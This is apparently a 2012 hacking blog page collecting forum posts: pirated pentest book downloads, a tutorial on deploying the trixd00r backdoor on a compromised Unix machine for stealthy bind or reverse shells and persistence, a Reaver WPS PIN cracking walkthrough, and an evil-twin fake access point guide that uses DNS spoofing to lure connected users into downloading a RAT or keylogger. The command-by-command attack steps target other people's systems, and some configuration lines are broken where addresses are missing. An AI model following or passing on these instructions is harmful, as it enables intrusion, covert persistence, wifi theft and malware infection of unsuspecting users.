Wednesday, 10 October 2012

Books to get you going as a Pentester *PDF*

Books to get you going as a Pentester
I thought I would contribute a few books that I have read that got me really interested in penetration testing so here you go,
I'm sure there are many other great books but these are the ones I liked.
I hope everyone enjoys these books as much as I did.

They are all tested for viruses etc. Enjoy

Metasploit The PenTesters Guide:
[Image: 396-1.png]

Nmap Cook Book:
[Image: 9781449902520.jpg]

Netcat Powertools:
[Image: netcat-power-tools.jpg]

Hacking Exposed 6th Edition:
Link got removed. I will resolve this ASAP
[Image: 20164725185.jpeg]

Linux Complete Command Reference:
[Image: images?q=tbn:ANd9GcTZkK6qFeiLBlZJLNHWIPx...AB-SVd54LQ]

Linux Bible 2010:
[Image: 0470485051.MZZ.jpg]

A byte of Python:
[Image: 6762544.jpg]

I hope everyone enjoys these books as much as I did.

- aBlackHippy
Read More

[[ TUT ]] Trixd00r *nix Backdoor Usage [[ TUT ]]

Hey what's up everybody, this is my first tutorial so bear with me. Rolleyes

Trixd00r is a great little tool from the guys over at nullsecurity that is a very stealth backdoor on any *nix system. It's got a server and a client so obviously to use this you would already have access to the box, but you need to come back later or something so trixd00r is perfect for that.
Also, to run the server on the compromised machine you will need to either be root, or w/e user you are to be in the sudoers file and know their password.

Alright moving on, go ahead and grab the tar file...


Untar it...

tar -zxvf trixd00r-0.0.1.tar.gz

Go to the newly created directory...

cd trixd00r-0.0.1

Okay so now we will type the command make to get some output for the installation directions, and you will get the following:

[Image: trix.png]

Okay so as you can see it gives us the option to install on quite a few different OS's, in this case I will choose Linux.

make linux

Alright so it should spit some stuff on your screen and when you do an ls command you should have some new goodies in the directory.

[Image: trix2k.png]

If you are using this on OS X, choose will need to have the command line utils installed though, just go to github and get the prepackaged gcc installer if you don't have time or don't want to download Xcode, otherwise you get an error about no gmake/make being present.
Oh and if linux complains about no gmake too, just make a symbolic link between make and gmake. ln -s /usr/bin/make /usr/bin/gmake

The great thing about trixd00r is that the server (compromised machine) listens invisibly for "magic packets" sent from the client (attacker) and when it gets those packets it will either bind a shell on a tcp/udp port of our choosing or connect back to us again using either protocols.

Good job, we have the server (trixd00rd) and the client (trixd00r) ready for use. Now to the fun stuff!

Trixd00r Bind Connection
Now we need to set up our trixd00rd on the compromised machine, to do that we run sudo ./trixd00rd -H to get a list of options.

[Image: trix4.png]

A really cool feature is you just put a ? after the option to see it needs.

So first off the -i flag is for the interface connected to the web that we'll be using...pretty self explanatory.

And sudo ./trixd00rd -i en1 -t ? would get me...

[Image: trix5.png]

The default is the TCP SYN packet which I'm just going to leave it...the other protocols are the same process as this one, I'll leave it up to you to play with them and discover why one would be more advantageous than the others, situational dependent.
If you don't know the different protocols and how they work, I recommend reading up on them due to the fact that they're just good to know. Not understanding even basic tcp/ip (i'm no expert) is just ignorant, especially when it's fun to learn about, and hacking/pentesting and information security has so much do with it.

The -s flag is which shell mode we want to use, again I used a ? to see the different this case we are using the TCP Bind option, which will be -s 0

[Image: trix34.png]

Alright the two options above (-t and -s) are the most important, so I will show you the rest of the options I used, a picture and then explain them below.

sudo ./trixd00rd -i en1 -t 0 -s 0 -b <port> -v

[Image: trix88.png]

-b 2302 This is the port that our listener will be bound to, waiting for the magic packet to give us our shell. The default is 31337, which comes up as "Elite" on a port scan, so if the admin, or user or whoever runs a scan because he's security minded he will see that port open which is known to be a trojan/backdoor/RAT/etc so I always change my backdoor ports to shit that is a game app or some obscure port that has nothing to with any of the above - out of sight, out of mind.
^^^The only time this will come up on a port scan is when you are actually interacting with trixd00rd, any other time and it will just show up as closed, or filtered to an outsider - that's why this is so stealthy! Thumbsup

-v The -v option is for verbosity, I like to see output to know what is going on and if something goes wrong it will say in plain english.

Our server is waiting for the magic packets, so now we go to our client and interact with the shell!

./trixd00r -h <target IP> -t 0 -s 0 -p <port> -m <passphrase> -v

[Image: trix87.png]

-h This tells trixd00r where to send the packet to get our shell.

-t 0 and -s 0 have to match up with trixd00rd - for obvious reasons.

-p 2302 This tells trixd00r which port the server is listening on.

-v Again, verbosity.

And we're done. If all went well, you'll get a nice welcome banner like the one below, and a prompt waiting for input!

[Image: trix12.png]

Trixd00r Reverse Connection

Now everything is pretty much the same as above except a few options, so instead of explaining everything I will just show you the commands, a picture and explain the options that changed.

For the server, we will drop the -b <port> option and add the -c <connect back host IP> and change the -s from 0 to 1 (indicating we want a reverse connection instead of a bind shell) like so.

sudo ./trixd00rd -i en1 -t 0 -s 1 -c <connect back IP> -v

[Image: trix66.png]

For the client, we do the same as above, except there is no need for a -c option because the server is connecting back to us.

./trixd00r -h <target IP> -t 0 -s 1 -v

[Image: trix100.png]

Voila, perfect reverse shell connection.

Closing the Connection

To COMPLETELY close the connection we use control+C on the client and then add -m byebye and hit enter, it will tell you that it sent the magic packet which means the connection was closed and now the server is NOT listening anymore.
[Image: bybye.png]

Server side if you send the byebye packet it will look like this...
[Image: trix14.png]

To keep the server listening on the compromised machine so you can come back later, just hit control+C on the client but do not send the byebye packet.


Aight that's it, hope you enjoyed the tutorial! All credits go to for making trixd00r and also to their youtube video where I got all the info to make this.

I'm not an expert with this tool, although it's not like it's really complicated, but if you have any questions about it I'm glad to help...also lemme know how you liked the tutorial.

Thanks for reading, and have a good day.
Read More

CompTIA Security+ Deluxe Study Guide Free Download

[Image: ibyqi4cdpLcu9.jpg]

I have been studying for this certification exam and this book has been very useful. This isn't a one stop shop to this exam. They encourage you to learn more than what this book teaches, but I wanted to share this with anyone who wants to study for the exam or just read some useful information.

Table Of Contents
Chapter 1: General Security Concepts.
Chapter 2: Identifying Potential Risks.
Chapter 3: Infrastructure and Connectivity.
Chapter 4: Monitoring Activity and Intrusion Detection.
Chapter 5: Implementing and Maintaining a Secure Network.
Chapter 6: Securing the Network and Environment.
Chapter 7: Cryptography Basics, Methods, and Standards.
Chapter 8: Security Policies and Procedures.
Chapter 9: Security Administration.

Please reply here to keep this thread alive. Thanks
Read More

Tuesday, 2 October 2012


WPS (Wifi Protected Setup) is a feature created in 2007 to make Wifi Protected Networking easy for the average user while making it secure. However due to a design flaw in the authentication for the PIN for the device, this has allowed the ability to Crack the PIN on a WPS enabled AP. This has nothing to do with cracking the WPA/WPA2 PSK, although it will be obtained with this method.

The PIN is broken down as 11112223 (Example for explanation only and not to be taken literally)
The 1111 is the first half of the PIN. The 222 is the second half of the PIN. The 3 is a checksum of the entire PIN (first 7 digits). Reaver must first obtain the first half of the PIN (1111) before it can go on to the second half (222). When reaver is running you will notice 1111 changes 222 remains same and 3 changes, until it obtains the first half of the PIN. Then the 1111 remains same, 222 and 3 changes as it obtains the second half of the PIN.

Tools needed
Linux Distro (I recommend BackTrack 5r1)
A compatible Wifi Adapter (research your preference ie; AWUS036H)
NB: Reaver will only run on linux and why BackTrack 5r1 is recommended.

With Backtrack Running download Reaver
extract and install reaver as follows from Terminal:
tar xvfz reaver1.xxxx (xxxx being the release number which will change with updates)
cd /src/
make install

Assuming no errors lets continue
Open a fresh terminal and let get the adapter running in promiscuous mode and type the following

airmon-ng (this will list your wifi adapters, most common is wlan0)
airmon-ng start wlan0 (replace wlan0 with the one you get listed)
you should receive output that tells you which Interface is in Monitor Mode. Most commonly mon0

Now in the same terminal lets see who is around and type the following:
airodump-ng --encrypt wpa mon0 (this will display only WPA/WPA2 encrypted networks. Let it run for 30 sec or so till you see all AP's that you can. Hit CTRL+C

AP's should be listed by power so you want to start with the top ones and work your way down the list. But wait.. how do I know if WPS is enabled. Glad you asked.

Open a new terminal and type the following:
walsh -i mon0 (replace mon0 as noted above. This will scan for all WPS enabled AP's in range and remove the guess work and compare it to the airodump-ng output and pick out the highest powered AP first.)

Now we are ready to start. Go back to the Terminal that you installed reaver with and type the following:

reaver -i mon0 -b BSSID -S -vv (Change mon0 as noted previously. BSSID is the MAC address of the AP. You can use the MAC from the walsh output or the airodump-ng output as they will be the same. The -S switch reduces the packet size sent to the AP and thereby decreases the attack time. The -vv switch will display all errors and PIN's tested.)

Now just let it run.

You may see the percentage in reaver output go from 2% to 90% just like that. This is normal when it finds the first half of the PIN. This is also why you will notice the second half of the PIN as noted above as 222 remains constant before it finds the first half.

Errors are a common thing to see and caused by many variables.
WARNING: Receive timeout occurred
WARNING: 10 failed connections in a row
WARNING: Out of order packet received, re-trasmitting last message
Just let it run.
Read More
Tired of cracking WEP? Tired of WPA and countless hours of dictionary attacks? Then it's time to be sexy. YOU need to be sexy. And I'll show you how.

Here's the deal: how would you like to create a fake access point named, say Wifi Hotspot, and have people connect to YOU. From there, you can mess around with them, DNS spoof them to websites, or even your own web server convincing them to download your RAT/keylogger. Or how about monitoring all their websites and network traffic? I won't show you all of this, but I'll show you some.

First off, I would like to give a huge shoutout to member proxx8187. He helped me a great deal diagnosing problems in the making of this tutorial. Some of you may recognize him as the encyclopedia giving answers to all of your incessant questions ;) Another big shoutout goes to SpyFi. He inspired me to pursue this area and thus the creation of this tutorial. Some may recognize him as the genius behind many great tutorials all around HF, as well as his Android hacking threads. Another member who helped to diagnose problems was GeeMann. He's amazing and one of the highest quality users I've seen around the HF wireless section. In case you didn't know, he's the mastermind behind our WPS cracking tutorial. I also would like to thank CapitalS for helping me out too in the creation of this tutorial. This was made mostly by me, but would have been impossible without the help of these four great members!

Now the tutorial!! This is for educational purposes only. Please stay ethical with this and always get permission before you do something. I know you will ignore my plea for righteousness, but really, stay ethical. It will pay off in the long term! Now, let me give a brief overview of what we are going to accomplish here. We will create a fake access point with whatever name you like, and provide any person that connects to it with internet access, so they will think they are on a legitimate access point! Then from there, we can do many things do the client.








1. Two wireless interfaces. (An external USB wifi adapter, plus your internal wifi laptop adapter) A good external wifi adapter is the ALFA AWUS036H. It's the one I use. You can get one for about 25 dollars on Amazon.
2. Backtrack 5 R2 (R1 should work, but this was tested on R2)
3. A brain please.


We need to update Backtrack and then install the dhcp3 server.

apt-get update && apt-get upgrade && apt-get dist-upgrade

apt-get install dhcp3-server

Cool we got all the stuff we need! We are ready to begin our attack. Please make sure that your laptop interface (should be wlan0) is connected to your own router. Make sure that your external interface is plugged in and ready to go (this one should be wlan1).


We must begin the process of configuring our dhcp3 server so that our clients will receive an IP address when they connect. I expect your laptop interface to be connected to your router right now, and the external interface plugged in but not connected to any router, so we will run a check to determine our DNS address.

cat /etc/resolv.conf

See that IP address printed after "nameserver"? That's the DNS address. Please take note of it. In the soon following code, we will replace $dns with the DNS address you saw in the previous command.

gedit /etc/dhcp3/dhcpd.conf

If you are using Backtrack 5 KDE version, type this instead:

kwrite /etc/dhcp3/dhcpd.conf

If kwrite doesn't work, replace it with kate.

Now we have a text editor open with some text in it. Delete everything you see, and replace it with this:

ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet netmask {
option subnet-mask;
option broadcast-address;
option routers;
option domain-name-servers $dns;

Remember to replace $dns with your DNS address you learned earlier!!! So a possible line will look like this:

option domain-name-servers;


Let's configure our wireless interfaces shall we? We need to put our external interface into monitor mode. If you don't know the names of your interfaces, type "ifconfig" without quotes, and it will show you. In my situation, the external interface is wlan1, so just replace that with YOUR external interface.

airmon-ng start wlan1

airbase-ng -e "NAME OF ACCESS POINT HERE" -c 9 mon0

Now open a new terminal and type the following code which will set up our fake access point along with the dhcp3 server. Be sure to enter each command separately.

ifconfig at0 up
ifconfig at0 netmask
route add -net netmask gw
mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
echo > '/var/lib/dhcp3/dhcpd.leases'
dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/ at0

You should now have two terminals running. One with airbase-ng maintaining your fake access point, and another with the dhcp3 server open. We now need to set up our iptables to let our clients gain internet access.


Your laptop interface should be connected to your router!! I am assuming your laptop interface is wlan0, but if not, type ifconfig to see which one it is. If you don't know what it is, you should close out of this tutorial. There are some variables in this next code you will need to replace yourself. I will tell you how and which.

We need to find your gateway address. Type the following into a new terminal:

route | grep "default"

See that IP address next to "default"? That is your gateway IP address, and you should take note of it. It should, in most cases, be the same as your DNS address. Remember your laptop interface? It should be wlan0, if not, you should know what it is. In the following code, replace $interface with your laptop interface, and $gateway with your gateway IP address. Be sure to enter each command separately (yes a lot of copy and pasting).

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface $interface -j MASQUERADE
iptables -A INPUT -i [+] -j ACCEPT
iptables -A OUTPUT -o [+] -j ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gateway

Congratulations!!! You have set up a fake access point with WORKING internet connection. Go ahead, give it a try using another computer and connect to your access point!


Now that our client(s) is connected to YOU, you can do whatever you want to them! One of my favorites is the use of DNS spoofing. While your clients are connected to you, you can redirect whatever website they visit to whatever website you want them to go. Or, even better, you can redirect them to your own web server on your computer that could convince them to download a RAT or keylogger.

I will show you how to perform a simple DNS spoofing attack on your client. Create a file in your ROOT folder named spoof. Enter the following text into that file.

Code: *

Now we initiate the DNS spoofing attack. This will redirect every website our client visits to YOU. So if you are running your own web server on your computer, they will be redirected to that web server. This is great for Java Applet attacks and other Social Engineering Toolkit stuff! Use the search option at the top of this website to find out more.

dnsspoof -i at0 -f /root/spoof

There, now every website they will visit will be redirected back to your own web server! Note, if you want this attack to be more flexible, edit the spoof file you created earlier. is the IP address you want to redirect them to. The parameter after that is the website you want to be redirected. For example, if I want to redirect my client's requests for to, I would enter the following in my spoof file.


Here, is the IP address of You can find the IP address of websites by pinging them in the terminal.


This is the end of my tutorial. I hope you found it informative, as well as a fresh new way of performing wireless attacks. There are myriad ways you can leverage this attack to perform all sorts of man-in-the-middle attacks, but I leave that up to you to research. I did the hard part for you, so now it's up to you to figure out the rest! Please say thanks!
Read More